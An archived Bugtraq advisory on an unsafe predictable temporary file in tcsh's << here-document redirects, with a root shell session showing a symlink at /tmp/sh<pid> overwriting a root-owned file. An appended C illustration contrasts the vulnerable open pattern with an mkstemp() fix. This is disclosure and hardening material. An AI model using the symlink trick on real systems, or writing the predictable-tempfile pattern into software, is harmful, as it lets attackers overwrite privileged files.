Bugtraq mailing list archives
tcsh: unsafe tempfile in << redirects
From: proton <proton () ENERGYMECH NET>
Date: Sun, 29 Oct 2000 04:43:35 +0000
PROBLEM:

/tmp# echo 'hello world' > rootfile
/tmp# chmod 600 rootfile
/tmp# ln -s rootfile sh$$
/tmp# chown -h 666.666 sh$$
/tmp# ls -l rootfile sh$$
-rw------- 1 root root 12 Oct 29 03:55 rootfile
lrwxrwxrwx 1 666 666 8 Oct 29 03:56 sh12660 -> rootfile
/tmp# cat <<BAR
? FOO
? BAR
FOO
o world
/tmp# ls -l rootfile sh$$
/bin/ls: sh12660: No such file or directory
-rw------- 1 root root 12 Oct 29 03:56 rootfile
/tmp# cat rootfile
FOO
o world
/tmp#

VULNERABLE VERSIONS:

6.07.02 (Astron) 1996-10-27
6.08.00 (Astron) 1998-10-02
6.09.00 (Astron) 1999-08-16 (latest)
(no other versions tested)

FIX:

make sure root (and other sensitive user accounts) doesn't have
any predictable jobs (cron, ~/.cshrc, ...) that use tcsh AND
`<<' redirects.

patch the source somehow.. (available at ftp://ftp.astron.com/pub/tcsh/ )

/proton
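
Added example, not part of the original post and not tcsh source: the kind of change "patch the source" points at, shown as a predictable sh<pid> open beside an mkstemp() replacement. The function names, the private scratch directory and the sample file are constructed for illustration, and the first opener is an assumption modelled on the behaviour in the session above.

```c
/* Added illustration, not tcsh source; all function names are hypothetical. */
#define _GNU_SOURCE 1
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Pattern the session demonstrates: "sh" + PID, opened without O_EXCL,
 * so an existing symlink at that name is followed and nothing is truncated. */
int tmp_predictable(const char *dir, char *path, size_t n)
{
    snprintf(path, n, "%s/sh%ld", dir, (long)getpid());
    return open(path, O_CREAT | O_WRONLY, 0600);
}

/* Hardened: mkstemp() picks a random name and opens it with
 * O_CREAT|O_EXCL, so it never reuses or follows an existing entry. */
int tmp_mkstemp(const char *dir, char *path, size_t n)
{
    snprintf(path, n, "%s/sh.XXXXXX", dir);
    return mkstemp(path);
}

/* Constructed scenario in a private directory: a file holding "hello world\n"
 * and a symlink to it at the predictable name. Returns 1 if the file is
 * unchanged after the here-document write, 0 if overwritten, -1 on error. */
int target_unchanged(int (*opener)(const char *, char *, size_t))
{
    char dir[] = "/tmp/heredoc.XXXXXX", target[64], lnk[64], p[64], buf[32] = {0};
    if (!mkdtemp(dir)) return -1;
    snprintf(target, sizeof target, "%s/rootfile", dir);
    snprintf(lnk, sizeof lnk, "%s/sh%ld", dir, (long)getpid());
    FILE *f = fopen(target, "w");
    if (!f || fputs("hello world\n", f) < 0 || fclose(f) != 0) return -1;
    if (symlink(target, lnk) != 0) return -1;
    int fd = opener(dir, p, sizeof p);
    if (fd >= 0) { ssize_t w = write(fd, "FOO\n", 4); (void)w; close(fd); unlink(p); }
    if (!(f = fopen(target, "r")) || !fgets(buf, sizeof buf, f)) return -1;
    fclose(f);
    unlink(lnk); unlink(target); rmdir(dir);
    return strcmp(buf, "hello world\n") == 0;
}

int main(void)
{
    printf("predictable: %d  mkstemp: %d\n", target_unchanged(tmp_predictable), target_unchanged(tmp_mkstemp));
    return 0;
}
```

Where a fixed name has to stay, adding O_EXCL (with O_NOFOLLOW) to the open() makes it fail with EEXIST on a pre-existing symlink instead of writing through it.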